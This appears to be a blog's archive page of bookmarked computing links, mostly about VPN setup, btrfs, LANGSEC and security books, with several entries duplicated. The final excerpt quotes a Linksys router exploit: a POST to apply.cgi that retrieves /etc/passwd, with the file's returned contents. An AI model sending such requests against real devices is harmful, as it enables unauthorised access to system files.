Archive for the 'Computers' Category

[wikileaks ]PRISM – DHS PRISM 2004 – Requirements for Installation (original doc)

Saturday, June 8th, 2013

original PRISM docs from wikileaks

Centos L2TP Client to Mikrotik L2TP-Server | xxxl.co.za

Sunday, June 2nd, 2013

How to create dynamic VPN tunnel between a linux server and Mikrotik device. This is suitable if you want to create a tunnel between an EC2 instance and small office

NOTE: Example does not provide encryption.

Centos L2TP Client to Mikrotik L2TP-Server | xxxl.co.za

Sunday, June 2nd, 2013

How to create dynamic VPN tunnel between a linux server and Mikrotik device. This is suitable if you want to create a tunnel between an EC2 instance and small office

NOTE: Example does not provide encryption.

The btrfs backup experiment | Anchor Web Hosting Blog

Friday, April 26th, 2013

Today we’re talking about our experience with btrfs, the next-gen Linux filesystem. btrfs has been maturing rapidly over the last few years and offers many compelling features for modern systems, so we’ve been putting it through its paces on some o…

The btrfs backup experiment | Anchor Web Hosting Blog

Friday, April 26th, 2013

Today we’re talking about our experience with btrfs, the next-gen Linux filesystem. btrfs has been maturing rapidly over the last few years and offers many compelling features for modern systems, so we’ve been putting it through its paces on some o…

Language-theoretic Security

Sunday, April 14th, 2013

The Language-theoretic approach (LANGSEC) regards the Internet insecurity epidemic as a consequence of ad hoc programming of input handling at all layers of network stacks, and in other kinds of software stacks. LANGSEC posits that the only path to tru…

Language-theoretic Security

Sunday, April 14th, 2013

The Language-theoretic approach (LANGSEC) regards the Internet insecurity epidemic as a consequence of ad hoc programming of input handling at all layers of network stacks, and in other kinds of software stacks. LANGSEC posits that the only path to tru…

Security Engineering – A Guide to Building Dependable Distributed Systems

Sunday, April 14th, 2013

Security Engineering , by Ross Andreson. ‘It’s beautiful. This is the best book on the topic there is’ Bruce Schneier

Security Engineering – A Guide to Building Dependable Distributed Systems

Sunday, April 14th, 2013

Security Engineering , by Ross Andreson. ‘It’s beautiful. This is the best book on the topic there is’ Bruce Schneier

Don’t Use Linksys Routers « Superevr

Sunday, April 14th, 2013

the firmware is so buggy/insecure, so getting passwd file is as easy as: POST /apply.cgi Host: 192.168.1.1 submit_button=Wireless_Basic&change_action=gozila_cgi≠xt_page=/etc/passwd ====> root:x:0:0::/:/bin/sh nobody:x:99:99:Nobody:/:/bin/nolog…